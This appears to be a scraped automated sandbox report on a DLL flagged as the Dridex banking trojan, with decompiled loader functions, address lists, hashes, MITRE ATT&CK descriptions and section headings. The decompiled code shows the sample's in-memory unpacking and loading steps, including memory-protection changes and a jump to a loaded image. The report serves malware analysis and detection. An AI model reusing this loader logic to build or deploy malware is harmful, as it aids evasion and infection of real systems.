0x00000000
0x00000000
0x73321b18
0x73321b1e
0x73321b23
0x73321b2a
0x73321b2e
0x73321b43
0x73321b45
0x73321b47
0x73321b4d
0x73321b5b
0x73321b5b
0x73321b61
0x00000000
0x73321b61
0x00000000
0x00000000
0x00000000
0x00000000
0x73321aab
0x73321aab
0x73321aab
0x73321aac
0x73321aaf
0x73321ab3
0x00000000
0x73321ac9
0x73321acc
0x73321acf
0x73321ad8
0x73321adb
0x73321adc
0x73321ade
0x00000000
0x73321519
0x7332151b
0x73321520
0x7332152b
0x73321539
0x7332154c
0x73321559
0x73321562
0x73321566
0x7332156a
0x733215b2
0x733215b2
0x733215b4
0x733215bb
0x00000000
0x00000000
0x733215d4
0x733215dc
0x733215e0
0x733215f5
0x733215f9
0x733215fd
0x73321606
0x7332160c
0x7332160f
0x73321613
0x7332161b
0x7332161d
0x73321621
0x73321628
0x73321631
0x73321631
0x73321635
0x7332164a
0x73321660
0x7332166d
0x7332166e
0x7332166e
0x73321670
0x00000000
0x00000000
0x00000000
0x00000000
0x7332162a
0x7332162a
0x7332162a
0x7332162b
0x7332162c
0x00000000
0x7332162a
0x733215ef
0x733215f3
0x00000000
0x00000000
0x00000000
0x73321674
0x73321674
0x73321675
0x73321678
0x73321682
0x73321682
0x73321686
0x7332168d
0x733216e8
0x733216ed
0x73321740
0x73321740
0x73321744
0x73321748
0x73321572
0x73321575
0x7332157a
0x73321580
0x73321583
0x7332158a
0x7332158e
0x73321595
0x7332159e
0x733215a2
0x733215a6
0x733215ac
0x00000000
0x00000000
0x00000000
0x733215ac
0x73321752
0x7332175e
0x73321769
0x73321770
0x73321779
0x73321783
0x73321784
0x73321792
0x73321797
0x73321798
0x733217a5
0x733217aa
0x733217bc
0x733217c1
0x733217c6
0x733217d8
0x733217ea
0x733217ef
0x733217fa
0x73321801
0x73321806
0x7332180e
0x73321817
0x73321817
0x73321823
0x7332182a
0x73321836
0x73321842
0x73321850
0x73321861
0x73321868
0x7332186d
0x73321876
0x7332187b
0x7332187d
0x73321881
0x73321885
0x73321892
0x7332189f
0x733218a3
0x733218b7
0x733218bb
0x00000000
0x00000000
0x733218d0
0x733218d2
0x733218da
0x733218d7
0x733218d7
0x733218d7
0x733218de
0x733218e0
0x733218e6
0x733218ec
0x73321948
0x73321951
0x73321955
0x73321962
0x7332196b
0x73321970
0x73321974
0x73321977
0x733219d8
0x733219ee
0x733219f9
0x733219fa
0x733219fb
0x733219ff
0x73321a02
0x73321c82
0x73321c85
0x73321c85
0x00000000
0x73321a02
0x73321981
0x73321991
0x7332199a
0x733219a3
0x733219ac
0x733219ad
0x733219ae
0x733219b3
0x733219bb
0x733219c3
0x00000000
0x00000000
0x00000000
0x733219c5
0x733218f5
0x733218fa
0x733218fe
0x733218fe
0x73321902
0x73321905
0x00000000
0x00000000
0x73321926
0x73321928
0x7332192c
0x7332192e
0x00000000
0x00000000
0x73321930
0x73321937
0x73321943
0x00000000
0x73321943
0x7332190a
0x00000000
0x73321a08
0x73321a08
0x73321a09
0x73321a19
0x73321a25
0x73321a2e
0x73321a37
0x73321a40
0x00000000
0x73321a40
0x733216ef
0x733216f1
0x733216f3
0x733216f8
0x733216fd
0x73321710
0x73321726
0x7332172f
0x73321730
0x73321730
0x73321732
0x73321733
0x73321736
0x7332173a
0x00000000
0x733216f3
0x7332168f
0x73321699
0x7332169a
0x7332169a
0x733216a7
0x733216b3
0x733216b5
0x733216b7
0x733216bb
0x733216cb
0x733216cb
0x733216d2
0x733216d5
0x733216d6
0x733216da
0x733216e4
0x00000000
0x733216e4

Memory Dump Source

Source File: 00000002.00000002.631853045.0000000073311000.00000020.00020000.sdmp, Offset: 73310000, based on PE: true

Associated: 00000002.00000002.631802830.0000000073310000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.631958328.000000007332A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.631970217.000000007332D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.631979356.000000007332F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98483ba118d36436ff3b3d44b5ecb4259e9e37b11eb101673cda47564bd4c24c
Instruction ID: cba521998e89a7ead843cde0623c3f58cf86eae616d529f788fd286e9ec96747
Opcode Fuzzy Hash: 98483ba118d36436ff3b3d44b5ecb4259e9e37b11eb101673cda47564bd4c24c
Instruction Fuzzy Hash: 10328E719083459FD325DF24CD80BAEBBF5AF94301F148A2DE596872A1EB70E946CB42

Uniqueness

Uniqueness Score: -1.00%

Function 73316DC8, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E73316DC8() {

				 *0x7332d280 = GetUserNameW;
				 *0x7332D284 = MessageBoxW;
				 *0x7332D288 = GetLastError;
				 *0x7332D28C = CreateFileA;
				 *0x7332D290 = DebugBreak;
				 *0x7332D294 = FlushFileBuffers;
				 *0x7332D298 = FreeEnvironmentStringsA;
				 *0x7332D29C = GetConsoleOutputCP;
				 *0x7332D2A0 = GetEnvironmentStrings;
				 *0x7332D2A4 = GetLocaleInfoA;
				 *0x7332D2A8 = GetStartupInfoA;
				 *0x7332D2AC = GetStringTypeA;
				 *0x7332D2B0 = HeapValidate;
				 *0x7332D2B4 = IsBadReadPtr;
				 *0x7332D2B8 = LCMapStringA;
				 *0x7332D2BC = LoadLibraryA;
				 *0x7332D2C0 = OutputDebugStringA;
				return 0x7332d280;
			}

0x73316dd9
0x73316de1
0x73316de4
0x73316df3
0x73316df6
0x73316e05
0x73316e08
0x73316e17
0x73316e1a
0x73316e29
0x73316e2c
0x73316e3b
0x73316e3e
0x73316e4d
0x73316e50
0x73316e5f
0x73316e62
0x73316e65

Memory Dump Source

Source File: 00000002.00000002.631853045.0000000073311000.00000020.00020000.sdmp, Offset: 73310000, based on PE: true

Associated: 00000002.00000002.631802830.0000000073310000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.631958328.000000007332A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.631970217.000000007332D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.631979356.000000007332F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 923d672a29e93adf676e5d847a9cfc42dd18127417e49fb0735e043207c47d0d
Instruction ID: 4a36f5aed0ac18f797eac628f668f66d28ef05d6c8714877bd05fb4939f89cb3
Opcode Fuzzy Hash: 923d672a29e93adf676e5d847a9cfc42dd18127417e49fb0735e043207c47d0d
Instruction Fuzzy Hash: 0D11E3BA915600CF8368DF06D190E517BF5BB9C320321C19ED82D8B366DB38D845DF54

Uniqueness

Uniqueness Score: -1.00%

Function 7331BC00, Relevance: .0, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E7331BC00(intOrPtr* __ecx) {
				void* _t1;
				intOrPtr* _t4;

				_t4 = __ecx;
				_t1 = E7331C33C(__ecx);
				if(_t1 != 0) {
					L4:
					return _t1;
				} else {
					_t1 = E73322F8C(0xa5eabdf8, 0x2c2324e8);
					if(_t1 == 0) {
						 *_t4 = 0;
						goto L4;
					} else {
						_push( *_t4);
						asm("int3");
						return _t1;
					}
				}
			}

0x7331bc01
0x7331bc03
0x7331bc0a
0x7331bc29
0x7331bc2a
0x7331bc0c
0x7331bc16
0x7331bc1d
0x7331bc23
0x00000000
0x7331bc1f
0x7331bc1f
0x7331bc21
0x7331bc22
0x7331bc22
0x7331bc1d

Memory Dump Source

Source File: 00000002.00000002.631853045.0000000073311000.00000020.00020000.sdmp, Offset: 73310000, based on PE: true

Associated: 00000002.00000002.631802830.0000000073310000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.631958328.000000007332A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.631970217.000000007332D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.631979356.000000007332F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 229d0e70dd984517c4ff88a566391a3803afd3012da0cf9cedecb5fa3dd55369
Instruction ID: da7a09304e1e3f277d69a16e187735917d8161292bccf32944b6638a02b28410
Opcode Fuzzy Hash: 229d0e70dd984517c4ff88a566391a3803afd3012da0cf9cedecb5fa3dd55369
Instruction Fuzzy Hash: 50D0127210064377EF391735BE40B55E7AD4FC5251F1809965941670A9CFA680724021

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 6544 Parent PID: 1552 rundll32.exeCOMMON

Executed Functions

Function 006D2213, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 169
memoryCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E006D2213(long __ebx, long __edi, void* __esi, intOrPtr* _a4) {
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr* _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				void* _v72;
				char* _v76;
				int _v80;
				long _v84;
				long _v88;
				DWORD* _v92;
				intOrPtr _v96;
				int _v100;
				intOrPtr* _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				void* _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				char* _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				int _v168;
				char* _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				char _v184;
				intOrPtr* _t136;
				int _t143;
				int _t151;
				int _t155;
				intOrPtr _t170;
				int _t177;
				void* _t226;
				intOrPtr _t229;
				intOrPtr _t234;
				void* _t236;
				intOrPtr* _t240;
				intOrPtr _t247;
				intOrPtr _t251;
				DWORD* _t264;
				void* _t268;
				intOrPtr* _t271;
				intOrPtr* _t272;

				_t136 = _a4;
				_v20 = 0;
				_t236 =  *((intOrPtr*)(_t136 + 0x40));
				 *0x6d4418 = 1;
				asm("movaps xmm0, [0x6d3010]");
				asm("movups [0x6d4428], xmm0");
				_v48 = _t136;
				_v52 =  *((intOrPtr*)(_t136 + 0x64));
				_v56 =  *((intOrPtr*)(_v48 + 8));
				_v184 = _t236;
				_v60 =  *((intOrPtr*)(_v48 + 0x50));
				_v180 = _v52;
				_v176 = 4;
				_v172 =  &_v20;
				_v64 =  *((intOrPtr*)(_t136 + 0x60));
				_v68 = 4;
				_v72 = _t236;
				_v76 =  &_v20;
				_t143 = VirtualProtect(__esi, __edi, __ebx, _t264); // executed
				_v80 = _t143;
				_v184 = _v72;
				_v180 = 0;
				_v176 =  *((intOrPtr*)(_v48 + 0x64));
				_v84 = 0x400;
				_v88 = 2;
				_v92 =  &_v20;
				_v96 = 0;
				E006D2569();
				E006D1D28(_v72,  *((intOrPtr*)(_v48 + 0xc)), _v56);
				E006D2569( *((intOrPtr*)(_v48 + 0xc)), 0, _v56);
				_t151 = VirtualProtect(_v72, 0x400, 2, _v92); // executed
				_t271 = _t268 - 0x88;
				_t226 = _v72;
				_t251 =  *((intOrPtr*)(_t226 + 0x3c));
				_v100 = _t151;
				_v104 = _v72 + 0x3c;
				_v108 = _t226;
				_v112 = _t251;
				if(_t251 != 0) {
					_v108 = _v72 + (_v112 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_v144 = _v108;
				if(_v60 != 0) {
					_v148 = 0;
					_v152 = _v144 + 0x18 + ( *(_v144 + 0x14) & 0x0000ffff);
					while(1) {
						_t170 = _v152;
						_v160 = _t170;
						_t247 = _v160;
						_v184 = _v72 +  *((intOrPtr*)(_t247 + 0xc));
						_v180 =  *((intOrPtr*)(_t247 + 8));
						_v176 =  *((intOrPtr*)(0x6d4418 + (( *(_t170 + 0x24) >> 0x0000001e & 0x00000001) << 4) + ( *(_t170 + 0x24) >> 0x1f << 3) + (( *(_t170 + 0x24) >> 0x0000001d & 0x00000001) << 2)));
						_v172 =  &_v20;
						_v164 = _v148;
						_t177 = VirtualProtect(??, ??, ??, ??); // executed
						_t271 = _t271 - 0x10;
						_t234 = _v164 + 1;
						_v168 = _t177;
						_v148 = _t234;
						_v152 = _v160 + 0x28;
						if(_t234 == _v60) {
							goto L9;
						}
					}
				}
				L9:
				 *_t271 = _v72;
				_v124 = _v72 +  *((intOrPtr*)(_v48 + 0x24));
				_t155 = DisableThreadLibraryCalls(??);
				_t272 = _t271 - 4;
				_t229 =  *_v104;
				_v156 = _t155;
				_v116 = _t229;
				_v120 = _v72;
				if(_t229 != 0) {
					_v120 = _v72 + (_v116 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_t240 = _v48;
				_v44 =  *((intOrPtr*)(_t240 + 0x20));
				_v40 =  *((intOrPtr*)(_t240 + 0x18));
				_v36 =  *((intOrPtr*)(_t240 + 0x34));
				_v32 =  *((intOrPtr*)(_t240 + 0x30));
				_v28 =  *_t240;
				_v24 = _v124;
				 *_t272 = _t240;
				_v184 = 0;
				_v180 = 0x74;
				_v128 =  *((intOrPtr*)(_v120 + 0x28));
				_v132 = 0;
				_v136 = 0x74;
				_v140 =  &_v44;
				E006D2569();
				if(_v128 != 0) {
					_t272 =  *((intOrPtr*)( &_v44 + 0x10));
					goto __eax;
				}
				return 1;
			}

0x006d221f
0x006d222d
0x006d2234
0x006d2237
0x006d2241
0x006d2248
0x006d2252
0x006d2258
0x006d2261
0x006d226a
0x006d226d
0x006d2273
0x006d2277
0x006d227f
0x006d2283
0x006d2286
0x006d2289
0x006d228c
0x006d228f
0x006d22a9
0x006d22af
0x006d22b2
0x006d22ba
0x006d22be
0x006d22c1
0x006d22c4
0x006d22c7
0x006d22ca
0x006d22e6
0x006d2303
0x006d2328
0x006d232a
0x006d2333
0x006d2336
0x006d2340
0x006d2343
0x006d2346
0x006d2349
0x006d234c
0x006d23a4
0x006d23a4
0x006d254a
0x006d2550
0x006d244d
0x006d2453
0x006d249f
0x006d249f
0x006d24bc
0x006d24e2
0x006d24f0
0x006d24f3
0x006d24f7
0x006d24fb
0x006d2502
0x006d2508
0x006d250a
0x006d251c
0x006d2524
0x006d252a
0x006d2530
0x006d2536
0x00000000
0x00000000
0x006d253c
0x006d249f
0x006d245b
0x006d2469
0x006d2471
0x006d2474
0x006d2476
0x006d247c
0x006d2488
0x006d248e
0x006d2491
0x006d2494
0x006d238a
0x006d238a
0x006d23d8
0x006d23de
0x006d23e4
0x006d23ea
0x006d23f0
0x006d23f5
0x006d23fb
0x006d23fe
0x006d2401
0x006d2409
0x006d2411
0x006d2414
0x006d2417
0x006d241d
0x006d2423
0x006d242e
0x006d2362
0x006d2368
0x006d2368
0x006d23c5

APIs

VirtualProtect.KERNELBASE ref: 006D228F
VirtualProtect.KERNELBASE ref: 006D2328

Strings

t, xrefs: 006D2409

Memory Dump Source

Source File: 00000006.00000002.622277704.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID: t
API String ID: 544645111-2238339752
Opcode ID: b1ef39077348cd890be5318e9286df608016ac6bed3beb25555ea16a26b08a09
Instruction ID: ea4f230b074d936eb4c5df00b92260f7792c372d9af2f7ccaa925dc23f0501b7
Opcode Fuzzy Hash: b1ef39077348cd890be5318e9286df608016ac6bed3beb25555ea16a26b08a09
Instruction Fuzzy Hash: 78819AB4E042099FCB04CF99C590A9DFBF1FF88310F65856AE958AB361D734A981CF91

Uniqueness

Uniqueness Score: -1.00%

Function 006D2439, Relevance: 1.6, APIs: 1, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 006D2508

Memory Dump Source

Source File: 00000006.00000002.622277704.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: ab4d10b7068e64bf640f8bce620050e02fe833a72616a63ff615be44feca56ef
Instruction ID: 9cf0d8de5361fb58d8267fcb4ebc071dd23a285de0beacd0aef7203743c591ac
Opcode Fuzzy Hash: ab4d10b7068e64bf640f8bce620050e02fe833a72616a63ff615be44feca56ef
Instruction Fuzzy Hash: 0331EBB5D002298FDB14CF68C98069DB7F2BF98300F16829AD94CA7305D731AE52CF81

Uniqueness

Uniqueness Score: -1.00%

Function 006D1D89, Relevance: 1.4, APIs: 1, Instructions: 107memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 006D1EA8

Memory Dump Source

Source File: 00000006.00000002.622277704.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 0b9b42ba2fdb08c7cefa25f605df8f332aac007ccc48bea5617a17140e49e517
Instruction ID: d0dee6eb9b7a430e1b9af118ddd7a9e5678065741052415ebd65a9d312bcd881
Opcode Fuzzy Hash: 0b9b42ba2fdb08c7cefa25f605df8f332aac007ccc48bea5617a17140e49e517
Instruction Fuzzy Hash: 2F41E0B1E0520A9FDB04DFA8C4906AEBBF1FF48314F19852EE808AB340D775A840CF94

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report CTkT1fRtQv.dll

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Dridex

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

System Behavior

Analysis Process: loaddll32.exe PID: 1552 Parent PID: 5588

General

Function 00B92213, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 169
memoryCOMMON

Function 733207CC, Relevance: 5.1, APIs: 3, Instructions: 628
COMMONCrypto

Function 73311494, Relevance: 1.9, Strings: 1, Instructions: 613
COMMONCrypto

Function 7332218C, Relevance: 1.5, APIs: 1, Instructions: 30
nativeCOMMON

Function 73322790, Relevance: 1.5, APIs: 1, Instructions: 29
memorynativeCOMMON

Function 73323060, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Function 73325DF0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 45
fileCOMMON

Function 73321140, Relevance: 3.1, APIs: 2, Instructions: 91
COMMON

Function 73325720, Relevance: 3.1, APIs: 2, Instructions: 74
registryCOMMON

Function 73325AA8, Relevance: 1.6, APIs: 1, Instructions: 123
COMMON

Function 73325B51, Relevance: 1.6, APIs: 1, Instructions: 63
fileCOMMON

Function 73325B29, Relevance: 1.6, APIs: 1, Instructions: 57
fileCOMMON

Function 73325B3D, Relevance: 1.6, APIs: 1, Instructions: 56
fileCOMMON

Function 73325B1F, Relevance: 1.6, APIs: 1, Instructions: 52
fileCOMMON

Function 73325B6D, Relevance: 1.6, APIs: 1, Instructions: 51
fileCOMMON

Function 73325D7C, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Function 733255B8, Relevance: 1.5, APIs: 1, Instructions: 45
registryCOMMON

Function 733210CC, Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Function 73323564, Relevance: 1.5, APIs: 1, Instructions: 42
memoryCOMMON

Function 73319144, Relevance: 2.4, Strings: 1, Instructions: 1104
COMMONCrypto

Function 7331A5A4, Relevance: 1.8, Strings: 1, Instructions: 537
COMMONCrypto

Function 733292DC, Relevance: 1.8, Strings: 1, Instructions: 529
COMMONCrypto

Function 733184E4, Relevance: 1.8, Strings: 1, Instructions: 529
COMMONCrypto

Function 733214D8, Relevance: .6, Instructions: 572
COMMONCrypto

Function 73316DC8, Relevance: .0, Instructions: 36
COMMON

Function 7331BC00, Relevance: .0, Instructions: 16
COMMON

Function 006D2213, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 169
memoryCOMMON